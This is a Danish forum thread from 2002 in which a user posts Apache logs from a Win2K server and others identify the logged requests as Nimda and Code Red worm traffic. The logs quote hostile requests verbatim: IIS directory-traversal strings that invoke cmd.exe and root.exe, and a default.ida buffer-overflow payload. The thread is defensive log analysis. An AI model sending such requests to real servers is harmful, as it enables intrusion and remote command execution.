Kandu.dk - Hjælp til log-fil, Apache http server på win2K


/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg

Glemt dit kodeord?

Brugernavn*

Kodeord *

Husk mig

Brugerservice

Kom godt i gang

Bliv medlem

Seneste indlæg

Find en bruger

Stil et spørgsmål

Skriv et tip

Fortæl en ven

Pointsystemet

Kontakt Kandu.dk

Emnevisning

Kategorier

Alfabetisk

Karriere

Interesser

Teknologi

Reklame

Top 10 brugere

Sikkerhed

#	Navn	Point
1	stl_s	37026
2	arlet	26827
3	miritdk	20260
4	o.v.n.	12167
5	als	8951
6	refi	8694
7	tedd	8272
8	BjarneD	7338
9	Klaudi	7257
10	molokyle	6481

Hjælp til log-fil, Apache http server på w~
Fra : Anders Fiedel

Dato : 17-08-02 23:24

Hej,

Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
ikke.
Jeg har fast IP og skal til og have et site op og stå, serveren er apache på
Win2k.
Det eneste der ligger på serveren er en dummy side til test. Så gæsten kan
ikke have gået efter noget specifikt.
Håber der er nogen der kan hjælpe/tyde dette.

Acces LOG
80.62.51.126 - - [17/Aug/2002:10:01:57 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:01:59 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:01 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:03 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:05 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
80.62.51.126 - - [17/Aug/2002:10:02:08 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
80.62.51.126 - - [17/Aug/2002:10:02:10 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.62.51.126 - - [17/Aug/2002:10:02:12 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.14.34.74 - - [17/Aug/2002:13:34:20 +0200] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 286
80.14.34.74 - - [17/Aug/2002:13:34:25 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 284
80.14.34.74 - - [17/Aug/2002:13:34:31 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.14.34.74 - - [17/Aug/2002:13:34:34 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.14.34.74 - - [17/Aug/2002:13:34:37 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.14.34.74 - - [17/Aug/2002:13:34:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325
80.14.34.74 - - [17/Aug/2002:13:34:46 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325
80.14.34.74 - - [17/Aug/2002:13:34:49 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 341
80.14.34.74 - - [17/Aug/2002:13:34:51 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:34:57 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:00 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:03 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:15 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
63.228.146.7 - - [17/Aug/2002:13:53:05 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328

Error LOG

[Sat Aug 17 10:02:12 2002] [error] [client 80.62.51.126] File does not
exist: f:/wwwroot/scripts/..%2f/winnt/system32/cmd.exe
[Sat Aug 17 13:34:20 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/root.exe
[Sat Aug 17 13:34:25 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/msadc/root.exe
[Sat Aug 17 13:34:31 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:34 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/d/winnt/system32/cmd.exe
[Sat Aug 17 13:34:37 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:43 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:46 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:49 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
[Sat Aug 17 13:34:51 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..Á/winnt/system32/cmd.exe
[Sat Aug 17 13:35:00 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..À¯/winnt/system32/cmd.exe
[Sat Aug 17 13:35:03 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..Áo/winnt/system32/cmd.exe
[Sat Aug 17 13:53:05 2002] [error] [client 63.228.146.7] Client sent
malformed Host header

Himbergeist (18-08-2002)

Kommentar
Fra : Himbergeist

Dato : 18-08-02 01:30

> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
> Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
> ikke.
Ligner et typisk angreb fra en eller anden inficeret IIS.
Ejeren af maskinen aner sandsynligvis ikke at han er angrebet.

> Jeg har fast IP og skal til og have et site op og stå, serveren er apache
på
> Win2k.

Da du bruger apache kan du lystigt ignorere den.
Den eneste skade den gør er at fylde dine access.log filer med støj.

- cep

Anders Fiedel (18-08-2002)

Kommentar
Fra : Anders Fiedel

Dato : 18-08-02 02:07

Takker,
Hvad er det bedste at gøre for at beskytte min server og resten af den PC
mod angreb.
Jeg har Sygate Pro kørende, men er det nok og skal den konfigureres specielt
eller kører den bare.

Anders

"Himbergeist" <REMOVEsnurrberget@yahoo.com> skrev i en meddelelse
news:3d5eeb85$0$94714$edfadb0f@dspool01.news.tele.dk...
> > Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
her.
> > Og hvad er det for filer der er forsøgt eksekveret, de eksisterer
åbenbart
> > ikke.
> Ligner et typisk angreb fra en eller anden inficeret IIS.
> Ejeren af maskinen aner sandsynligvis ikke at han er angrebet.
>
> > Jeg har fast IP og skal til og have et site op og stå, serveren er
apache
> på
> > Win2k.
>
> Da du bruger apache kan du lystigt ignorere den.
> Den eneste skade den gør er at fylde dine access.log filer med støj.
>
>
> - cep
>
>

Kasper Dupont (18-08-2002)

Kommentar
Fra : Kasper Dupont

Dato : 18-08-02 13:26

Anders Fiedel wrote:
>
> Takker,
> Hvad er det bedste at gøre for at beskytte min server og resten af den PC
> mod angreb.

De konkrete angreb har du allerede sikret dig mod ved at vælge en anden
webserver end lige netop IIS. Og uanset hvilken software man bruger, skal
man sørge for at opdatere den hurtigst muligt, når der bliver rettet fejl
med indflydelse på sikkerheden.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Carsten Nielsen (18-08-2002)

Kommentar
Fra : Carsten Nielsen

Dato : 18-08-02 14:39

"Anders Fiedel" <fiedel@c.dk> wrote in message news:<3d5eccf6$0$94733$edfadb0f@dspool01.news.tele.dk>...
> Hej,
>
> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
> Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
> ikke.
> Jeg har fast IP og skal til og have et site op og stå, serveren er apache på
> Win2k.
> Det eneste der ligger på serveren er en dummy side til test. Så gæsten kan
> ikke have gået efter noget specifikt.
> Håber der er nogen der kan hjælpe/tyde dette.
>
> Acces LOG
> 80.62.51.126 - - [17/Aug/2002:10:01:57 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

cmd.exe er den der eksekverer det der svarer til DOS kommandoer, dir,
delete, mkdir etc. Når der står dir efter det, må det være et forsøg
på at liste nogle filer.

> 80.62.51.126 - - [17/Aug/2002:10:01:59 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:01 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:03 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:05 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 80.62.51.126 - - [17/Aug/2002:10:02:08 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 80.62.51.126 - - [17/Aug/2002:10:02:10 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> 80.62.51.126 - - [17/Aug/2002:10:02:12 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308

Samme kommentar, det er forskellige måder at kalde kommandoen på, alt
efter hvor cmd.exe ligger på systemet.

> 80.14.34.74 - - [17/Aug/2002:13:34:20 +0200] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 286
> 80.14.34.74 - - [17/Aug/2002:13:34:25 +0200] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 284

Her er det root.exe virusen vil starte. Hvad root.exe laver ved jeg
ikke lige.

> 80.14.34.74 - - [17/Aug/2002:13:34:31 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
> 80.14.34.74 - - [17/Aug/2002:13:34:34 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
> 80.14.34.74 - - [17/Aug/2002:13:34:37 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> 80.14.34.74 - - [17/Aug/2002:13:34:43 +0200] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 325
> 80.14.34.74 - - [17/Aug/2002:13:34:46 +0200] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 325
> 80.14.34.74 - - [17/Aug/2002:13:34:49 +0200] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 341
> 80.14.34.74 - - [17/Aug/2002:13:34:51 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:34:57 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:00 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:03 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:15 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291

Igen cmd.exe + dir for nogle flere steder på systemet.

> 63.228.146.7 - - [17/Aug/2002:13:53:05 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 328
>

Dette er et forsøg på buffer overrun. NNN'erne skal fylde bufferen og
resten blever skrevet oveni en del af program-koden, som man så kalder
før eler siden.
>
> Error LOG
>
> [Sat Aug 17 10:02:12 2002] [error] [client 80.62.51.126] File does not
> exist: f:/wwwroot/scripts/..%2f/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:20 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/root.exe
> [Sat Aug 17 13:34:25 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/msadc/root.exe
> [Sat Aug 17 13:34:31 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:34 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/d/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:37 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:43 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:46 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:49 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/msadc/..%5c/..%5c/..%5c/..Á /..Á /..Á /winnt/system32/cmd.exe
> [Sat Aug 17 13:34:51 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..Á /winnt/system32/cmd.exe
> [Sat Aug 17 13:35:00 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..À¯/winnt/system32/cmd.exe
> [Sat Aug 17 13:35:03 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..Áo/winnt/system32/cmd.exe

Da cmd.exe ikke ligger her, blev den ikke fundet.

> [Sat Aug 17 13:53:05 2002] [error] [client 63.228.146.7] Client sent
> malformed Host header

Det er buffer overrunnen som den ikke kunne acceptere. Så Apache er
konstrueret godt nok til at det ikke lykkes.

Med venlig hilsen
Carsten Nielsen

Peder Vendelbo Mikke~ (18-08-2002)

Kommentar
Fra : Peder Vendelbo Mikke~

Dato : 18-08-02 22:47

Anders Fiedel skrev:

> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
> her.

Det er inficerede pcere som forsøger at inficere din maskine, hvis jeg
ikke husker forkert et det Nimda, Code Red og Code Red II.

Kontakt pågældendes udbyder for at få det stoppet, vedkommende der ejer
maskinen ved sikkert ikke at den er inficeret. Ud fra din logfil med
tidsstempel, kan udbyderen finde ud af hvem kunden er.

> Acces LOG
> 80.62.51.126

<URL: http://samspade.org/t/lookat?a=80.62.51.126 >

TDC, kontakt csirt(hos)csirt.dk

> 80.14.34.74

<URL: http://samspade.org/t/lookat?a=80.14.34.74 >

Wanadoo-kunde i frankrig, kontakt abuse(hos)francetelecom.net

> 63.228.146.7

<URL: http://samspade.org/t/lookat?a=63.228.146.7 >

Kontakt abuse(hos)uswest.net
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >

Kasper Dupont (19-08-2002)

Kommentar
Fra : Kasper Dupont

Dato : 19-08-02 07:56

Peder Vendelbo Mikkelsen wrote:
>
> Anders Fiedel skrev:
>
> > Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
> > her.
>
> Det er inficerede pcere som forsøger at inficere din maskine, hvis jeg
> ikke husker forkert et det Nimda, Code Red og Code Red II.

Code Red angreb udgør kun en meget lille procentdel af angrebene.
Code Red II eksisterer ikke mere, den havde indbygget en selv-
destruktion. Så i dag er der stort set kun Nimda angrebene
tilbage.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Søg

Reklame

Statistik

Spørgsmål :	177501
Tips :	31968
Nyheder :	719565
Indlæg :	6408527
Brugere :	218887

Månedens bedste

Årets bedste

Sidste års bedste